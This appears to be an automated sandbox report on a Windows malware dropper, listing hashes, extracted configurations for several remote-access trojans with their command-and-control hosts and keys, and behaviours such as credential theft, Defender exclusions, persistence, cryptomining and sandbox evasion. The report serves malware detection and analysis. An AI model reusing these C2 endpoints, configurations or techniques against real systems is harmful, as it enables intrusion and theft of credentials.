Analysis
-
max time kernel
570s -
max time network
906s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 19:31
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
asyncrat
0.5.8
Default
6.tcp.eu.ngrok.io:12925
hDtjdONRXVCh
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Helper Atanka
193.203.238.136:8080
14f39659-ca5b-4af7-8045-bed3500c385f
-
encryption_key
11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424
-
install_name
diskutil.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
diskutil
-
subdirectory
diskutil
Extracted
xworm
45.141.26.134:7000
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
darkvision
acuweld.ddns.net
Signatures
-
Asyncrat family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Detect Vidar Stealer 9 IoCs
resource yara_rule behavioral2/files/0x0003000000000709-426.dat family_vidar_v7 behavioral2/memory/4504-430-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral2/memory/4504-472-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral2/memory/3432-519-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral2/memory/3432-525-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral2/memory/3860-657-0x0000000004180000-0x00000000043B9000-memory.dmp family_vidar_v7 behavioral2/memory/3860-656-0x0000000004180000-0x00000000043B9000-memory.dmp family_vidar_v7 behavioral2/memory/3860-658-0x0000000004180000-0x00000000043B9000-memory.dmp family_vidar_v7 behavioral2/memory/3860-659-0x0000000004180000-0x00000000043B9000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023d2e-1034.dat family_xworm behavioral2/memory/4508-1040-0x0000000000040000-0x0000000000058000-memory.dmp family_xworm behavioral2/files/0x0010000000023d18-2612.dat family_xworm -
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Quasar family
-
Quasar payload 6 IoCs
resource yara_rule behavioral2/files/0x001e000000023ce2-400.dat family_quasar behavioral2/memory/1784-420-0x00000000001F0000-0x0000000000522000-memory.dmp family_quasar behavioral2/files/0x0005000000021fcd-2261.dat family_quasar behavioral2/files/0x0007000000022edd-2271.dat family_quasar behavioral2/files/0x0009000000023cc6-2302.dat family_quasar behavioral2/files/0x0012000000023a25-2544.dat family_quasar -
RunningRat
RunningRat is a remote access trojan first seen in 2018.
-
RunningRat payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023cc8-2328.dat family_runningrat behavioral2/files/0x0009000000023ccf-2345.dat family_runningrat -
Runningrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/804-387-0x0000000005090000-0x0000000005394000-memory.dmp family_stormkitty -
Stormkitty family
-
Vidar family
-
XMRig Miner payload 20 IoCs
resource yara_rule behavioral2/files/0x0007000000023cde-336.dat family_xmrig behavioral2/files/0x0007000000023cde-336.dat xmrig behavioral2/memory/2416-343-0x00007FF611930000-0x00007FF612564000-memory.dmp xmrig behavioral2/memory/444-562-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-563-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-565-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-585-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-588-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-589-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-592-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-595-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-596-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-648-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-651-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-660-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-663-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-666-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-770-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-877-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig behavioral2/memory/444-953-0x00007FF6247A0000-0x00007FF6253D4000-memory.dmp xmrig -
Xmrig family
-
Xworm family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral2/memory/804-387-0x0000000005090000-0x0000000005394000-memory.dmp family_asyncrat behavioral2/files/0x00030000000006dd-417.dat family_asyncrat behavioral2/files/0x000c000000023d0a-2554.dat family_asyncrat -
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
resource yara_rule behavioral2/files/0x0008000000023d5d-1758.dat mimikatz -
Blocklisted process makes network request 1 IoCs
flow pid Process 144 2416 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4232 powershell.exe 4828 powershell.exe 1492 powershell.exe 5244 powershell.exe 5864 powershell.exe 1108 powershell.exe 3208 powershell.exe 5988 powershell.exe 5736 powershell.exe 644 powershell.exe 448 powershell.exe 3896 powershell.exe 396 powershell.exe 4760 powershell.exe 2960 powershell.exe 2416 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion windows.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion windows.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion image.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion image.exe -
Checks computer location settings 2 TTPs 28 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation Conditioning.com Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation All function.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation Google%20Chrome.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation Coc%20Coc.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation ghjaedjgaw.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation CE5Mv2.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation ghjaedjgaw.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation ._cache_Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation DuckMatter.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation microsoft-onedrive.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation FullOption_2.1Xenos.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation CE5M.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation Fulloptionv2.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation ._cache_Fulloptionv2.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3916 cmd.exe 4676 powershell.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe -
Executes dropped EXE 64 IoCs
pid Process 4032 win.exe 3420 Systemhau.exe 2616 Office%202010%20Toolkit.exe 1244 Coc%20Coc.exe 2268 portable_util.exe 3932 setup.exe 4012 setup.exe 1760 winvnc.exe 3788 vc_redist.x64.exe 2248 vc_redist.x64.exe 3628 Google%20Chrome.exe 2416 xmrig.exe 4880 Bootxr.exe 804 .exe 1784 diskutil.exe 884 systempreter.exe 4504 ghjaedjgaw.exe 3200 diskutil.exe 3432 ghjaedjgaw.exe 444 xmrig.exe 1488 DuckMatter.exe 3860 Conditioning.com 2744 microsoft-onedrive.exe 3704 Built.exe 3948 onedrive.exe 2560 Built.exe 3960 vsrumanlxdbr.exe 5076 boost.exe 3948 CE5M.exe 4364 All function.exe 4508 svchost.exe 3524 ALL slumzick.exe 3864 svchost.exe 3744 CE5Mv2.exe 4224 FullOption_2.1Xenos.exe 3196 svchost.exe 704 FullOption_2.1Xenos.exe 4364 svchost.exe 4544 FullOption_2.1Xenos.exe 400 svchost.exe 3724 FullOption_2.1Xenos.exe 4044 svchost.exe 4756 FullOption_2.1Xenos.exe 4224 svchost.exe 3960 FullOption_2.1Xenos.exe 4512 svchost.exe 1892 FullOption_2.1Xenos.exe 1788 svchost.exe 332 FullOption_2.1Xenos.exe 4268 svchost.exe 4656 FullOption_2.1Xenos.exe 3864 svchost.exe 4352 FullOption_2.1Xenos.exe 4960 svchost.exe 1272 Fulloptionv2.exe 3760 FullOption_2.1Xenos.exe 2392 svchost.exe 5064 ._cache_Fulloptionv2.exe 1744 FullOption_2.1Xenos.exe 3624 svchost.exe 2340 Synaptics.exe 2676 Fulloptionnew_by elegance.exe 668 svchost.exe 4256 ._cache_Synaptics.exe -
Loads dropped DLL 34 IoCs
pid Process 2248 vc_redist.x64.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 2560 Built.exe 4544 33.exe 1204 wp.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe 5916 LaZagne.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0007000000023da1-2157.dat themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook LaZagne.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" Fulloptionv2.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GUTDSRESW = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\Bootxr.exe\"" Bootxr.exe Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system0189 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\.exe" .exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 119 raw.githubusercontent.com 120 raw.githubusercontent.com 141 6.tcp.eu.ngrok.io 398 raw.githubusercontent.com 399 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 385 ip-api.com 225 ip-api.com 251 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1376 powercfg.exe 5804 powercfg.exe 3716 powercfg.exe 4972 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe onedrive.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe vsrumanlxdbr.exe -
Enumerates processes with tasklist 1 TTPs 7 IoCs
pid Process 1400 tasklist.exe 4428 tasklist.exe 4380 tasklist.exe 2276 tasklist.exe 5020 tasklist.exe 4156 tasklist.exe 4992 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 1636 cmd.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3960 set thread context of 2380 3960 vsrumanlxdbr.exe 308 PID 3960 set thread context of 2400 3960 vsrumanlxdbr.exe 310 -
resource yara_rule behavioral2/memory/2560-709-0x00007FFA58EF0000-0x00007FFA594D8000-memory.dmp upx behavioral2/memory/2560-711-0x00007FFA757D0000-0x00007FFA757DF000-memory.dmp upx behavioral2/memory/2560-710-0x00007FFA73F70000-0x00007FFA73F94000-memory.dmp upx behavioral2/memory/2560-768-0x00007FFA598B0000-0x00007FFA599CC000-memory.dmp upx behavioral2/memory/2560-765-0x00007FFA589F0000-0x00007FFA58D65000-memory.dmp upx behavioral2/memory/2560-764-0x00007FFA71C90000-0x00007FFA71D48000-memory.dmp upx behavioral2/memory/2560-763-0x00007FFA71DB0000-0x00007FFA71DDE000-memory.dmp upx behavioral2/memory/2560-762-0x00007FFA723E0000-0x00007FFA723ED000-memory.dmp upx behavioral2/memory/2560-761-0x00007FFA721C0000-0x00007FFA721D9000-memory.dmp upx behavioral2/memory/2560-760-0x00007FFA58D70000-0x00007FFA58EE3000-memory.dmp upx behavioral2/memory/2560-759-0x00007FFA725E0000-0x00007FFA72603000-memory.dmp upx behavioral2/memory/2560-758-0x00007FFA756B0000-0x00007FFA756C9000-memory.dmp upx behavioral2/memory/2560-757-0x00007FFA72610000-0x00007FFA7263D000-memory.dmp upx behavioral2/memory/2560-767-0x00007FFA71D80000-0x00007FFA71D8D000-memory.dmp upx behavioral2/memory/2560-766-0x00007FFA71D90000-0x00007FFA71DA4000-memory.dmp upx behavioral2/memory/2560-841-0x00007FFA58EF0000-0x00007FFA594D8000-memory.dmp upx behavioral2/memory/2560-837-0x00007FFA589F0000-0x00007FFA58D65000-memory.dmp upx behavioral2/memory/2560-836-0x00007FFA71C90000-0x00007FFA71D48000-memory.dmp upx behavioral2/memory/2560-835-0x00007FFA71DB0000-0x00007FFA71DDE000-memory.dmp upx behavioral2/memory/2560-826-0x00007FFA58EF0000-0x00007FFA594D8000-memory.dmp upx behavioral2/memory/2560-827-0x00007FFA73F70000-0x00007FFA73F94000-memory.dmp upx behavioral2/memory/2560-902-0x00007FFA58EF0000-0x00007FFA594D8000-memory.dmp upx behavioral2/memory/2560-967-0x00007FFA58EF0000-0x00007FFA594D8000-memory.dmp upx behavioral2/memory/4544-1395-0x000000006E0E0000-0x000000006E3CD000-memory.dmp upx behavioral2/files/0x000c000000023d14-2587.dat upx -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\CocCoc\Browser\Application cmd.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\EndorsementHistoric DuckMatter.exe File opened for modification C:\Windows\ClassifiedsReduction DuckMatter.exe File created C:\Windows\Systemhau.exe win.exe File opened for modification C:\Windows\Systemhau.exe win.exe File created C:\Windows\Tasks\AutoKMS.job Office%202010%20Toolkit.exe File opened for modification C:\Windows\Tasks\AutoKMS.job Office%202010%20Toolkit.exe File opened for modification C:\Windows\AutoKMS\AutoKMS.exe Office%202010%20Toolkit.exe File opened for modification C:\Windows\AutoKMS\AutoKMS.ini Office%202010%20Toolkit.exe File opened for modification C:\Windows\SteadySpokesman DuckMatter.exe -
Launches sc.exe 13 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4704 sc.exe 3204 sc.exe 232 sc.exe 1364 sc.exe 4236 sc.exe 2340 sc.exe 1904 sc.exe 2488 sc.exe 5444 sc.exe 5064 sc.exe 2408 sc.exe 1916 sc.exe 2140 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023d57-1688.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 8 IoCs
pid pid_target Process procid_target 5916 3476 WerFault.exe 503 3344 3264 WerFault.exe 496 2580 4788 WerFault.exe 500 672 2532 WerFault.exe 497 3052 2532 WerFault.exe 497 6016 2288 WerFault.exe 495 5088 232 WerFault.exe 498 5828 6104 WerFault.exe 505 -
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ghjaedjgaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ghjaedjgaw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language portable_util.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winvnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootxr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DuckMatter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Office%202010%20Toolkit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language .exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 33.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vc_redist.x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language systempreter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Systemhau.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Conditioning.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language microsoft-onedrive.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fulloptionv2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language win.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vc_redist.x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3344 PING.EXE 3228 cmd.exe 5884 PING.EXE 5348 cmd.exe 4516 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1112 cmd.exe 3424 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
